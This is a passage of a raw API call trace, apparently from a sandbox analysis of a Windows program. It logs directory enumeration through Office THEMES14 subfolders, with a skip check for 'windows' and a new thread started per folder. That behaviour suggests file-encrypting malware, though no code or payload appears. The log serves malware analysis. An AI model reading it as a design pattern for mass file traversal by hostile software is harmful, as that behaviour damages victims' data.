Files\\Microsoft Shared\\THEMES14\\ICE" [0048.586] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE\\*.*" [0048.586] GlobalMemoryStatus (in: lpBuffer=0x18e1fd10 | out: lpBuffer=0x18e1fd10) [0048.586] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x2460d200, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x474 [0048.591] CloseHandle (hObject=0x474) returned 1 [0048.591] FindNextFileW (in: hFindFile=0x5da6b8, lpFindFileData=0x18e1fd30 | out: lpFindFileData=0x18e1fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x539538d0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d489150, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d489150, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="INDUST", cAlternateFileName="")) returned 1 [0048.591] lstrcmpW (lpString1=".", lpString2="INDUST") returned -1 [0048.591] lstrcmpW (lpString1="..", lpString2="INDUST") returned -1 [0048.591] lstrcmpiW (lpString1="windows", lpString2="INDUST") returned 1 [0048.593] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\*.*" [0048.593] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\*.*") returned 63 [0048.593] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\", lpString2="INDUST" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST" [0048.593] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\INDUST\\*.*" [0048.593] GlobalMemoryStatus (in: lpBuffer=0x18e1fd10 | out: lpBuffer=0x18e1fd10) [0048.593] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x24625268, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x474 [0048.600] CloseHandle (hObject=0x474) returned 1 [0048.600] FindNextFileW (in: hFindFile=0x5da6b8, lpFindFileData=0x18e1fd30 | out: lpFindFileData=0x18e1fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a6f8e30, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x65d5e3f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x65d5e3f0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="IRIS", cAlternateFileName="")) returned 1 [0048.600] lstrcmpW (lpString1=".", lpString2="IRIS") returned -1 [0048.600] lstrcmpW (lpString1="..", lpString2="IRIS") returned -1 [0048.600] lstrcmpiW (lpString1="windows", lpString2="IRIS") returned 1 [0048.601] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\*.*" [0048.601] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\*.*") returned 63 [0048.601] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\", lpString2="IRIS" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS" [0048.601] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\IRIS\\*.*" [0048.601] GlobalMemoryStatus (in: lpBuffer=0x18e1fd10 | out: lpBuffer=0x18e1fd10) [0048.601] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x995ab88, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x474 [0048.610] CloseHandle (hObject=0x474) returned 1 [0048.610] FindNextFileW (in: hFindFile=0x5da6b8, lpFindFileData=0x18e1fd30 | out: lpFindFileData=0x18e1fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x567be5d0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d489150, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d489150, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="JOURNAL", cAlternateFileName="")) returned 1 [0048.610] lstrcmpW (lpString1=".", lpString2="JOURNAL") returned -1 [0048.610] lstrcmpW (lpString1="..", lpString2="JOURNAL") returned -1 [0048.610] lstrcmpiW (lpString1="windows", lpString2="JOURNAL") returned 1 [0048.613] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\*.*" [0048.613] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\*.*") returned 63 [0048.613] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\", lpString2="JOURNAL" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL" [0048.613] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\*.*" [0048.613] GlobalMemoryStatus (in: lpBuffer=0x18e1fd10 | out: lpBuffer=0x18e1fd10) [0048.613] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x24685408, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x474 [0048.623] CloseHandle (hObject=0x474) returned 1 [0048.623] FindNextFileW (in: hFindFile=0x5da6b8, lpFindFileData=0x18e1fd30 | out: lpFindFileData=0x18e1fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x567e4730, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d489150, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d489150, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="LAYERS", cAlternateFileName="")) returned 1 [0048.623] lstrcmpW (lpString1=".", lpString2="LAYERS") returned -1 [0048.623] lstrcmpW (lpString1="..", lpString2="LAYERS") returned -1 [0048.623] lstrcmpiW (lpString1="windows", lpString2="LAYERS") returned 1 [0048.623] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\*.*" [0048.623] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\*.*") returned 63 [0048.623] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\", lpString2="LAYERS" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS" [0048.623] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\*.*" [0048.623] GlobalMemoryStatus (in: lpBuffer=0x18e1fd10 | out: lpBuffer=0x18e1fd10) [0048.623] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x5db0868, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x474 [0048.635] CloseHandle (hObject=0x474) returned 1 [0048.635] FindNextFileW (in: hFindFile=0x5da6b8, lpFindFileData=0x18e1fd30 | out: lpFindFileData=0x18e1fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a6f8e30, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x66247150, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x66247150, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="LEVEL", cAlternateFileName="")) returned 1 [0048.635] lstrcmpW (lpString1=".", lpString2="LEVEL") returned -1 [0048.635] lstrcmpW (lpString1="..", lpString2="LEVEL") returned -1 [0048.635] lstrcmpiW (lpString1="windows", lpString2="LEVEL") returned 1 [0048.637] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\*.*" [0048.637] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\*.*") returned 63 [0048.637] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\", lpString2="LEVEL" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL" [0048.637] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LEVEL\\*.*" [0048.637] GlobalMemoryStatus (in: lpBuffer=0x18e1fd10 | out: lpBuffer=0x18e1fd10) [0048.637] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x247255a8, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x474 [0048.652] CloseHandle (hObject=0x474) returned 1 [0048.652] FindNextFileW (in: hFindFile=0x5da6b8, lpFindFileData=0x18e1fd30 | out: lpFindFileData=0x18e1fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x59544a90, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d489150, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d489150, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NETWORK", cAlternateFileName="")) returned 1 [0048.652] lstrcmpW (lpString1=".", lpString2="NETWORK") returned -1 [0048.652] lstrcmpW (lpString1="..", lpString2="NETWORK") returned -1 [0048.652] lstrcmpiW (lpString1="windows", lpString2="NETWORK") returned 1 [0048.654] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\*.*" [0048.655] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\*.*") returned 63 [0048.655] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\", lpString2="NETWORK" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK" [0048.655] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\*.*" [0048.655] GlobalMemoryStatus (in: lpBuffer=0x18e1fd10 | out: lpBuffer=0x18e1fd10) [0048.655] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x2476d6e0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x474 [0049.465] CloseHandle (hObject=0x474) returned 1 [0049.465] FindNextFileW (in: hFindFile=0x5da6b8, lpFindFileData=0x18e1fd30 | out: lpFindFileData=0x18e1fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x59c68c90, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d489150, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d489150, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PAPYRUS", cAlternateFileName="")) returned 1 [0049.465] lstrcmpW (lpString1=".", lpString2="PAPYRUS") returned -1 [0049.465] lstrcmpW (lpString1="..", lpString2="PAPYRUS") returned -1 [0049.465] lstrcmpiW (lpString1="windows", lpString2="PAPYRUS") returned 1 [0049.673] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\*.*" [0049.673] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\*.*") returned 63 [0049.673] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\", lpString2="PAPYRUS" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS" [0049.673] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\*.*" [0049.673] GlobalMemoryStatus (in: lpBuffer=0x18e1fd10 | out: lpBuffer=0x18e1fd10) [0049.673] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x24e56d38, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x69c [0049.679] CloseHandle (hObject=0x69c) returned 1 [0049.679] FindNextFileW (in: hFindFile=0x5da6b8, lpFindFileData=0x18e1fd30 | out: lpFindFileData=0x18e1fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a44b570, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d05ead0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d05ead0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PIXEL", cAlternateFileName="")) returned 1 [0049.679] lstrcmpW (lpString1=".", lpString2="PIXEL") returned -1 [0049.679] lstrcmpW (lpString1="..", lpString2="PIXEL") returned -1 [0049.679] lstrcmpiW (lpString1="windows", lpString2="PIXEL") returned 1 [0049.681] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\*.*" [0049.681] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\*.*") returned 63 [0049.681] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\", lpString2="PIXEL" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL" [0049.681] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL\\*.*" [0049.681] GlobalMemoryStatus (in: lpBuffer=0x18e1fd10 | out: lpBuffer=0x18e1fd10) [0049.682] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x24e86e08, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x69c [0049.693] CloseHandle (hObject=0x69c) returned 1 [0049.693] FindNextFileW (in: hFindFile=0x5da6b8, lpFindFileData=0x18e1fd30 | out: lpFindFileData=0x18e1fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a6f8e30, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d084c30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d084c30, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PROFILE", cAlternateFileName="")) returned 1 [0049.693] lstrcmpW (lpString1=".", lpString2="PROFILE") returned -1 [0049.693] lstrcmpW (lpString1="..", lpString2="PROFILE") returned -1 [0049.693] lstrcmpiW (lpString1="windows", lpString2="PROFILE") returned 1 [0050.078] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\*.*" [0050.078] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\*.*") returned 63 [0050.078] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\", lpString2="PROFILE" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE" [0050.078] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PROFILE\\*.*" [0050.078] GlobalMemoryStatus (in: lpBuffer=0x18e1fd10 | out: lpBuffer=0x18e1fd10) [0050.078] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x24f2f0e0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x384 [0050.090] CloseHandle (hObject=0x384) returned 1 [0050.090] FindNextFileW (in: hFindFile=0x5da6b8, lpFindFileData=0x18e1fd30 | out: lpFindFileData=0x18e1fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a6f8e30, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d489150, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d489150, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="QUAD", cAlternateFileName="")) returned 1 [0050.090] lstrcmpW (lpString1=".", lpString2="QUAD") returned -1 [0050.090] lstrcmpW (lpString1="..", lpString2="QUAD") returned -1 [0050.090] lstrcmpiW (lpString1="windows", lpString2="QUAD") returned 1 [0050.090] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\*.*" [0050.090] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\*.*") returned 63 [0050.090] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\", lpString2="QUAD" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD" [0050.090] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\*.*" [0050.090] GlobalMemoryStatus (in: lpBuffer=0x18e1fd10 | out: lpBuffer=0x18e1fd10) [0050.091] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x1102f6c8, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x384 [0050.096] CloseHandle (hObject=0x384) returned 1 [0050.096] FindNextFileW (in: hFindFile=0x5da6b8, lpFindFileData=0x18e1fd30 | out: lpFindFileData=0x18e1fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a829930, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d0d0ef0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d0d0ef0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="RADIAL", cAlternateFileName="")) returned 1 [0050.096] lstrcmpW (lpString1=".", lpString2="RADIAL") returned -1 [0050.096] lstrcmpW (lpString1="..", lpString2="RADIAL") returned -1 [0050.096] lstrcmpiW (lpString1="windows", lpString2="RADIAL") returned 1 [0050.096] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\*.*" [0050.096] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\*.*") returned 63 [0050.096] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\", lpString2="RADIAL" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL" [0050.096] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL\\*.*" [0050.096] GlobalMemoryStatus (in: lpBuffer=0x18e1fd10 | out: lpBuffer=0x18e1fd10) [0050.096] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x10bf6590, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x384 [0050.103] CloseHandle (hObject=0x384) returned 1 [0050.103] FindNextFileW (in: hFindFile=0x5da6b8, lpFindFileData=0x18e1fd30 | out: lpFindFileData=0x18e1fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a84fa90, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d0d0ef0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d0d0ef0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="REFINED", cAlternateFileName="")) returned 1 [0050.103] lstrcmpW (lpString1=".", lpString2="REFINED") returned -1 [0050.103] lstrcmpW (lpString1="..", lpString2="REFINED") returned -1 [0050.103] lstrcmpiW (lpString1="windows", lpString2="REFINED") returned 1 [0050.106] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\*.*" [0050.106] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\*.*") returned 63 [0050.106] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\", lpString2="REFINED" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\REFINED") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\REFINED" [0050.106] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\REFINED", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\REFINED\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\REFINED\\*.*" [0050.106] GlobalMemoryStatus (in: lpBuffer=0x18e1fd10 | out: lpBuffer=0x18e1fd10) [0050.106] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, 